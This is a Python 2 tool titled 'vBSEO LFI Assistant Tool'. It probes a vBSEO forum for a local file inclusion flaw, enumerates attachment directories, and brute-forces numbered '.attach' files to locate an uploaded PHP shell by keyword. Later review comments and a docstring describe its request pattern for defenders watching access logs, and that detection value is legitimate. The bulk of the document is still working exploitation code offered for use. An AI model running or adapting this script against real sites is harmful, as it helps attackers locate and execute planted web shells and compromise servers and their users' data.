#!/usr/bin/python
#  ______          __                __  __  ______
# /\__  _\        /\ \__            /\ \/\ \/\  __ \/\__  _\
# \/_/\ \/   ___  \ \ ,_\    __   _ __\ \ `\\ \ \ \/\ \/_/\ \/
#    \ \ \  /' _ `\ \ \ \/  /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \
#     \_\ \__/\ \/\ \ \ \ \_/\  __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \
#     /\_____\ \_\ \_\ \__\ \____\\ \_\  \ \_\ \_\ \____/  \ \_\
#     \/_____/\/_/\/_/\/__/\/____/ \/_/   \/_/\/_/\/___/    \/_/
# --------------------------------------------------------
# Title:       vBSEO LFI Assistant Tool
# Author:      MaXe
# Site:        http://www.intern0t.net
#
# Description: 1) Checks whether the vBSEO installation
#                 is patched or not. 2) Attempts to find
#                 the physical location of an uploaded
#                 attachment phile. (PHP Shell)
#
# Version:     2.1.4 - Reversed Algorithm - Basic Version
#
# License:     -- Attribution-ShareAlike 3.0 Unported --
#              http://creativecommons.org/licenses/by-sa/3.0/
#
# Notes:       The basic version does not contain multi-
#              threading nor is it able to search through
#              multiple sub directories which the advanced
#              version will be able to.
#              Please note, that this tool does not work on
#              all types of hosts and you should therefore
#              modify this script to your own needs.
#
# Disclaimer:  This tool is meant for ethical purposes only.
"""Interactive, single-threaded vBSEO probe script (Python 2 only).

The script runs as a flat sequence of four phases, each of which issues
plain HTTP/1.x requests on port 80 to the host typed in at the prompt:

  1. One GET to ``/vbseo.php`` with ``vbseourl`` pointing at a relative
     path, and a check for a marker string in the body.
  2. One HEAD per name in ``main_dir``; a 403 is taken as "directory
     exists".
  3. Ten HEADs (``/<dir>/0/`` .. ``/<dir>/9/``) per directory found in 2.
  4. GETs for ``/<dir>/<n>/<i>.attach`` with ``i`` counting down from 99
     per subdirectory found in 3, until a 200 body matches the keyword.

For defenders, every phase has a fixed, easily recognisable request
shape (fixed path names, numeric enumeration, ``.attach`` suffix), so the
sequence stands out in web-server access logs; phase 1 is the single
request worth alerting on.

Python 2 only: ``httplib``, the ``print`` statement and ``raw_input``
do not exist under Python 3.  No exception handling is present, so a
DNS or connect failure terminates the script with a traceback.
"""

# Import the appropriate libraries.
import os
import re
import httplib
import sys

# Clear the screen in a sufficient way.
# NOTE(review): os.system() with a fixed literal; no user input reaches the shell here.
if(os.name) == "posix":
    os.system("clear")
elif(os.name) == "nt":
    os.system("cls")
else:
    print "[!] Cannot clear screen automatically.\n"

print "File Finder by MaXe from InterN0T.net\n\n"

# Get user-input and define global variables.
# `target` is used verbatim as the HTTPConnection host (port is always 80);
# `file_match` is later interpolated into a regular expression unescaped.
target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
# The four directory names probed in phase 2 (fixed list, no wordlist file).
main_dir = ["attach","attachment","attachments","download"]
# Filled by phase 2 (names from main_dir that answered 403).
poss_main_dir = []
# Filled by phase 3 ("<dir>/<n>" strings that answered 403).
sub_dir = []

# Strip away http and https from the target variable.
# Only a leading scheme is removed; a path or port left in the input is
# passed to HTTPConnection unchanged (HTTPConnection does split "host:port").
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', target)

# Perform a simple LFI to check whether the target is vulnerable or not.
# Phase 1: a single GET. The `vbseourl` query parameter is the request
# detail that identifies this probe in access logs.
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Checking if site appears to be vulnerable."
conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
resp = conn.getresponse()

# If the response code is 200 OK, check if the file really was included.
# The marker is a regex, so the three dots in "Enter text..." match any
# three characters, not literal dots.  Only 200 and 404 are handled; any
# other status prints nothing.  Note that the script does NOT stop on a
# negative result: phases 2-4 run regardless of what this check printed.
# This connection is never closed explicitly (conn is simply rebound below).
if resp.status == 200:
    print "[+] Site is responding, this is good."
    if re.search("(Enter text...)", resp.read()):
        print ">> The site appears to be vulnerable!"
    else:
        print "[!] The site appears to be patched. (unknown error)"
elif resp.status == 404:
    print "[!] The site appears to be patched. (404)"

# Search for attachment directories
# Phase 2: one HEAD per fixed name.  `main_dir[0:]` is a full-slice copy of
# the list; iterating main_dir directly would be equivalent.
for value in main_dir[0:]:
    conn = httplib.HTTPConnection(newtarget, 80)
    print "[*] Trying: http://%s/%s/" % (newtarget,value)
    conn.request("HEAD", "/%s/" % value)
    resp = conn.getresponse()
    # If the response code is 403 (Forbidden), set a new variable and continue.
    # 403 is the only status treated as a hit; 200, 301/302 and 404 are all
    # ignored, so a host that answers 403 to every unknown path will make
    # every name in main_dir look "found".
    if resp.status == 403:
        print "[+] Directory found: /%s/" % value
        # NOTE(review): both branches yield the same list; the `== []`
        # special case is redundant (`poss_main_dir += [value]` alone suffices).
        if poss_main_dir == []:
            poss_main_dir = ["%s" % value]
        else:
            poss_main_dir += ["%s" % value]
    conn.close()

# Nothing answered 403 in phase 2: exit with status 0 (sys.exit() default).
if poss_main_dir == []:
    print "[!] No directories were found, exiting."
    sys.exit()

# Search for possible sub directories
# Phase 3: for each directory from phase 2, HEAD /<dir>/0/ through /<dir>/9/
# (ten requests, single-digit names only; see the "Notes" header).
for value in poss_main_dir:
    i = 0
    print "[*] Trying subdirs within: http://%s/%s/" % (newtarget,value)
    while i <= 9:
        conn = httplib.HTTPConnection(newtarget, 80)
        conn.request("HEAD", "/%s/%s/" % (value,i))
        resp = conn.getresponse()
        # Same 403-means-exists heuristic as phase 2.
        if resp.status == 403:
            print "[+] Sub Directory found: /%s/%s/" % (value,i)
            found = "%s/%s" % (value,i)
            # NOTE(review): redundant `== []` special case, as in phase 2.
            if sub_dir == []:
                sub_dir = ["%s" % found]
            else:
                sub_dir += ["%s" % found]
        i=i+1
        conn.close()

# Nothing answered 403 in phase 3: exit with status 0.
if sub_dir == []:
    print "[!] No sub directories were found, exiting."
    sys.exit()

# Search all the sub directories found for our phile
# Phase 4: GET /<dir>/<n>/<i>.attach for i = 99, 98, ..., 0 in each
# subdirectory -- at most 100 requests per subdirectory.  The first 200
# response whose body matches the keyword ends the script with exit
# status 0; if no body matches, the script falls off the end silently.
for value in sub_dir[0:]:
    i = 99
    print "[*] Trying to find our file within: /%s/" % value
    while i >= 0:
        conn = httplib.HTTPConnection(newtarget, 80)
        conn.request("GET", "/%s/%s.attach" % (value,i))
        resp = conn.getresponse()
        if resp.status == 200:
            print "[+] File found, does it match our keyword? >> %s" % file_match
            # NOTE(review): `file_match` is interpolated into the pattern
            # unescaped, so it is a regex, not a literal: metacharacters
            # in the keyword change the match, and an unbalanced "(" or "["
            # raises re.error and aborts the script.  re.escape() would be
            # needed for a literal keyword match.
            if re.search("(%s)" % file_match, resp.read()):
                print ">> File contains our keyword!"
                print "Part URL: /%s/%s.attach" % (value,i)
                print "Full URL: http://" + newtarget + "/%s/%s.attach \n" % (value,i)
                sys.exit(0)
        i=i-1
        conn.close()

# Don't forget, that this script can be used for more than one thing.